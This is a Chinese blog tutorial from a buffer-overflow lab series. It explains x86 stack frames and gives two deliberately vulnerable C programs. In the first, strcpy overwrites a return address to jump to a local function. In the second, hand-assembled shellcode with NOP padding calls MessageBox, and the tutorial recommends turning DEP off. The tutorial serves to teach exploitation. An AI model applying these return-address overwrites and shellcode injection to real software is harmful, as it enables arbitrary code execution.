缓冲区溢出(栈溢出)实验 之 函数调用

最新推荐文章于 2024-05-03 15:45:34 发布
最新推荐文章于 2024-05-03 15:45:34 发布
阅读量6.9k 收藏 16
点赞数 2
分类专栏: Windows应用层开发 Windows安全 文章标签: 缓冲区溢出调用系统函数 缓冲区溢出调用函数 函数执行过程栈的变化 0Day安全 栈溢出原理与实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyb_l_code/article/details/81225517
版权

前言

之前介绍的的缓冲区溢出导致站内变量值被修改(缓冲区溢出(栈溢出)实验 之 改变栈内的变量

本小节介绍通过缓冲区溢出调用函数,此外通过学习也对函数栈的了解有所加深,这里加上小段自己对函数栈的理解

函数栈的介绍

通过汇编介绍函数执行过程中栈的变化:

EBP:栈底 存储着上一个栈的栈底EBP

ESP:栈顶 存储着系统栈的栈顶(函数栈形成是保存系统栈栈顶)

EIP:存储下一条将要执行指令的地址

我们习惯将栈底和栈顶之间划分为一个栈:访问栈是以栈底EBP作为基准的

调用函数(cdecl调用约定 --》 自右向左压栈 调用者负责清理传参的内存栈)

压入函数参数:

0041171E  lea         eax,[input]  

00411721  push        eax  

调用函数:

00411722  call        overflow (04112A3h)

开辟新栈:

push        ebp  //先将上一个栈的栈底保存到栈中

mov         ebp,esp  //将上一个栈的栈顶作为下一个栈的栈底即ESP赋值给EBP

之后将传递的参数压入栈中,执行函数内的指令

 

mov         esp,ebp  //将存储的上一个栈的栈顶恢复到ESP中

pop         ebp  

ret  

完成栈的恢复,函数结束

 add         esp,4 //清除掉传递参数时开辟的栈内存(此处栈顶上移四个字节) 

1、调用程序自身函数

首选上源码

#include<iostream>
#include<windows.h>
#include <string.h>
using namespace std;
int overflow(const char* input)
{
	BOOL bFlAG = TRUE;
	int nFlag = 1;
	char buf[8];

	memset(buf, 0, 8);
	printf("Virtual address of 'buf' = Ox%p\n", buf);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	strcpy(buf, input);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	return 0;
}
void Fun()
{
	printf("Buffer Overflow Success!\r\n");
	return;
}

int main()
{

	printf("Virtual address of 'overflow' = Ox%p\n", overflow);
	printf("Virtual address of 'overflow' = Ox%p\n", Fun);
	//注意这里ff后,但其实默认添加了’\0’在最后面
	//char input[] = "AAAAAAAB";//good input, ASCII code of 'A' is 41
//构造新的字符串
char input[] = "AAAAAAAABBBBBBBBAAAC\x46\x17\x41\x00";//0x00411570
	overflow(input);
	system("pause");
	return 0;
}

目标:更改栈的返回值,将返回值改为函数“Fun”的地址,那么当函数overflow返回时,会将返回地址填入EIP中,使得程序执行Fun函数。

 

查看的Fun的地址为0x00411570

进入overflow函数,并且在Fun函数内断点,

查看寄存器得到ESP为0x0019FE34,EBP为0x0019FE90

 

查看栈内存,标记红框的依次为ESP、buf、EBP、返回值(返回值位于EBP下的四字节内存,buf为将要分配给他的内存)

此时运行在“BOOL bFlAG = TRUE;”处

复制“strcpy(buf, input);”前内存情况

 

复制“strcpy(buf, input);”后内存情况

可看出我们将更改了buf、nFlag、bFlag、EBP的内容以及返回地址,其中返回地址修改为“Fun”函数的地址继续运行得到程序的结果如下图,该方法破坏了buf到返回地址存储位置所有的内存

我们成功的在没有调用“Fun”函数的情况下,执行了“Fun”函数

 

不过不幸的是我们破坏了栈的平衡,当程序从Fun函数中退出后,找不到下一句应该执行了语句所在的地址了,该问题导致出现以下提示:

 

问题描述:导致该问题的根源在于栈平衡被破坏,程序无法正确找到下一个执行指令

解决方案:可以在Fun函数加上exit()直接退出进程这个提示就不存在了,但是这个方法仅仅是治标不治本,我们应该去重新调节堆栈的平衡

2、通过缓冲区溢出调用系统函数(messagebox)

#include<iostream>
#include<windows.h>
#include <string.h>
using namespace std;

int overflow(const char* input)
{
	BOOL bFlAG = TRUE;
	int nFlag = 1;
	char buf[44];

	memset(buf, 0, 44);
	printf("Virtual address of 'buf' = Ox%p\n", buf);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	strcpy(buf, input);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	return 0;
}
void Fun()
{
	printf("Buffer Overflow Success!\r\n");
	exit(0);
	return;
}

int main()
{

	printf("Virtual address of 'overflow' = Ox%p\n", overflow);
	//加载user32.dll库
	HMODULE hUserModule = LoadLibrary("user32.dll");
	if (NULL == hUserModule)
	{
		printf("动态库加载失败BufferOverflow.cpp 错误码:%d \r\n",GetLastError());
		return 0;
	}
	printf("MessageBox Address %X\r\n", MessageBox);
	//MessageBox(NULL, "failwest", "failwest", 0);
	//printf("Virtual address of 'overflow' = Ox%p\n", Fun);
	//注意这里ff后,但其实默认添加了’\0’在最后面
	char input[] = "\x33\xDB\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50\x53\xB8\xB0\xF8\x0E\x74\xFF\xD0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x38\xFE\x19"
		
		
		;//Messagebox函数地址:0x740EF8B0
	//char input[] = "AAAAAAB";//good input, ASCII code of 'A' is 41
											  //char input[] = "AAAAAAA";//good input, ASCII code of 'A' is 41
 	overflow(input);
	system("pause");
	return 0;
}

进入overflow函数查看栈内存 ESP = 0019FDEC EBP = 0019FE6C

被标记出来的分别为ESP、EBP、函数结束后的返回地址

Shellcode如何构成

使用ebx的异或作为0使用

调用messagebox函数需要在栈中压入函数的参数(自右向左压入)

33DB XOR EBX,EBX

  1. PUSH EBX  

6877657374 PUSH 74736577

686661696C push 6C696166

将字符串传入EAX中

8BC4 mov eax,esp

53 push ebx

50 push eax

50 push eax

53 push ebx

压栈完毕调用messagebox(地址:0x740EF8B0)x0E\x74\xFF\xD0

B80E74FFD0 mov eax, 0E74FFD0 

FFD0 call eax

然后在函数返回地址处填充buf的地址

在其他非关键位置填充NOP指令,这样就够成了今天使用的shellcode

申请的buf地址为0x0019fe38,在Buf中填充执行调用系统函数的代码,然后再函数返回地址处填充上buf的地址,使得函数执行结束后跳到buf地址处继续执行我们的调用系统函数的地址。系统函数为调用messagebox函数弹出failwest提示消息。

strcpy(buf, input);”函数后

我们发现EBP后的返回地址改为buf的地址,因此程序在结束函数overflow后会调到0x0019fe38处继续执行我们精心构造的shellcode。如此就完成了通过栈溢出调用messagebox函数。

注意:此处会出现栈内存无法执行的问题,解决方案为修改 项目--》属性--》链接器--》高级--》数据执行保护(DEP)  为 否 (/NXCOMPAT:NO)

执行结果为

 

下一篇: 缓冲区溢出(栈溢出)实验 之 JMP ESP

 

开发农民
关注
  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
缓冲区【】溢出原理实验(一)
mdp1234的博客
11-22 378
1.一段具有缓冲区溢出的代码 #include "stdio.h" #include "string.h" #include <windows.h> char payload[] = "aaaaaaaabbbbbbbbbbbbxxxx"; void exp() { system("whoami"); } void func() { char buffer[8]; strcpy(buffer,payload); printf("%s",buffer); } int.
PWN基础之函数调用栈溢出
weixin_46132162的博客
12-28 1388
函数调用结束时,顶的函数(callee)状态被弹出,顶恢复到调用函数(caller)的状态函数调用在内存中从高地址向低地址生长,所以顶对应的内存地址在压时变小,退时变大。接下来vulnerable_function()函数调用read()函数,这个时候vulnerable_function()函数为主函数(caller function)read()函数为被函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数函数调用是什么样的。
栈溢出笔记1.1 函数调用过程
hustd10的博客
04-09 4644
选择从栈溢出开始学习Shellcode的编写,是因为在没有保护机制(Cookie,ASLR,DEP,SafeSEH)的系统中使用栈溢出是一件很简单的事情。区随着函数调用动态变化,每个函数调用时在上占用的空间称为帧。用一个示例来说明上保存的内容及动态变化过程。 下面是一个程序,生成一个对话框显示一条“Hello World!”消息。下面是该程序的C代码: 在VS2008中用Debu
2024年网安最全计算机系统基础实训三—AttackLab实验
最新发布
2401_84281629的博客
05-03 1248
强化机器级表示、汇编语言、试器和逆向工程等方面基础知识,并结合帧工作原理实现简单的栈溢出攻击,掌握其基本攻击基本方式和原理,进一步为编程过程中应对栈溢出攻击打下一定的基础。理解缓冲区的工作原理和字符填充过程及其特点。对于无边界检测的语言及其工作方式所造成的缓冲区漏洞加深理解。通过字符串填充的方式,完成5个阶段的缓冲区攻击。分别基于基本返回地址填充、攻击代码填充、ROP等实现这5个难度递增的阶段的缓冲区溢出攻击。
又溢出了
11-03 353
stackoverflow again! 编译器什么时候会生成检查的代码呢?_chkstk 内部都做了哪些事呢?该如何避免呢?本文以一个实际项目中的栈溢出为出发点,尽量挖掘出栈溢出背后的一些逻辑。欢迎留言交流!
利用栈溢出控制程序运行的跳转小实验
weixin_42592516的博客
09-20 325
x64 dbg\逆向\栈溢出
详解栈溢出
dongdong7_77的博客
05-28 5570
前言 在我们平时开发的过程中,经常会出现stack overflow的情况导致程序崩溃,通常的原因都是无限的递归调用导致的,也就是无限的调用函数,导致空间用完,可是为什么非要使用呢,它内部是怎么运行的,的空间一共有多大呢,在下面会一一的详解 为什么要使用程序? 我们先来看一段代码 // function_example.c #include <stdio.h> int static add(int a, int b) { return a+b; } int main() {
VS的C6386警告(缓冲区溢出)的消除方法
热门推荐
Marc Pony
08-11 1万+
VS的C6386警告(缓冲区溢出)的消除方法
十二、缓冲区溢出漏洞原理
wanhex的博客
03-07 1735
缓冲区溢出漏洞是一种非常普遍且危险的漏洞,在各种操作系统、应用软件中广泛存在,在路由器中也不例外。利用缓冲区溢出攻击,可以造成程序运行失败、系统宕机、更为严重的是,利用缓冲区溢出攻击可以执行非授权指令,进而取得系统特权进行各种非法操作。本次内容主要分享和总结了MIPS程序的空间缓冲区溢出原理,并通过代码示例让你更进一步的体会缓冲区溢出漏洞的利用效果。 MIPS原理 这里的缓冲区主要指的是,...
缓冲区溢出利用实验(详细步骤)
02-23
由于程序的运行机制,假设利用 strcpy()函数进行字符串赋值,因定义的字符 串及输入字符串长度不一致或过长,从而占用了 ebp(底)和 call(函数)返回地址的 区。基于此可利用修改的函数调用结束后的返回地址...
安全编程之缓冲区溢出.7z
08-20
**安全编程之缓冲区溢出** 在IT领域,安全编程是一项至关重要的技能,尤其是在系统和应用程序设计中。缓冲区溢出是其中最常见的安全漏洞之一,它可能导致数据丢失、程序崩溃,甚至恶意代码执行,对系统安全构成严重...
缓冲区溢出漏洞研究与进展.pdf
10-29
1.1 **堆栈溢出攻击**:这是最常见的溢出类型,如图所示,当函数调用时,参数、返回地址、前一个的指针以及本地变量被压入中。如果一个函数(如strcpy)没有检查输入字符串的长度,那么过长的字符串会覆盖返回...
huanchongquyichu.rar_缓冲区溢出
09-21
**缓冲区溢出详解** 缓冲区溢出是计算机编程中的一种常见安全漏洞,它发生在程序试图向固定大小的内存区域(缓冲区)写入超出其实际容量的数据时。这种漏洞可能导致程序崩溃,甚至可能被恶意攻击者利用执行任意...
缓冲区溢出
01-08
**缓冲区溢出详解** 缓冲区溢出是计算机编程中的一种常见错误,它发生在程序尝试向固定大小的内存区域(缓冲区)写入超过其实际容量的数据时。这个概念是网络安全和软件开发中的核心问题,因为溢出可能导致数据丢失...
C语言高级编程:利用栈溢出修改函数返回地址
ARM-Linux
08-09 3416
利用函数栈溢出,修改函数返回地址,进而调用别的函数。 测试环境: win10 x86-64 gcc: x86_64-pc-cygwin 代码 #include <stdio.h> #include <stdlib.h> #include <string.h> int len; typedef void ( * p_fun)(vo...
vc6缓冲区溢出的笨办法
bucherren的专栏
01-10 966
从vc7以后对缓冲区溢出有了很多办法,vc6貌似没有直接的办法,要么用第三方工具。 下面有一个土一点的办法: 1. 一般函数调用前都有push ebp; move ebp, esp;这样的语句,这两条语句是为了保存返回地址。可以在move ebp, esp之前查看ebp的值,然后在内存窗口的地址中输入ebp的值,不要关闭内存窗口。 2. 单步前进,同时关注内存窗口。如果发现值变了,(这个
修复缓冲区溢出问题
05-15 1324
<!-- alimama_pid="mm_10249644_1605763_4929893"; alimama_titlecolor="707070"; alimama_descolor ="CCCCCC"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="FFFFFF"; alimama_linkcolor="DADA
利用缓冲区溢出执行函数
ProgrammingLearner的博客
07-05 1182
首先用代码 #include "stdafx.h" void overFlow() { while (1) { printf( "over flow!\n"); } getchar(); } int main() { int a[3] = { 0 }; return 0; } 用VS查看反汇编代码 a[2]对应的地址为EBP-C 学过汇编我
被破坏的几种情况
Jchn lau
03-05 1万+
简要说明: 程序的内存空间是向下增长的,堆内存向上增长。 局部变量赋值越界 例如: 局部字符串数组拷贝字符串,当拷贝的字符串大大的超过变量空间就会破坏堆 char buff[4] = {0, }; strcpy(buff, "Hello,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"); 指向局部变量的指针越界修改数据 例如: void test...
【BUPT计算机系统基础】CSAPP-lab3-缓冲区溢出攻击.docx
11-29
攻击文件由老师提供,文件内容包含:实验报告

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值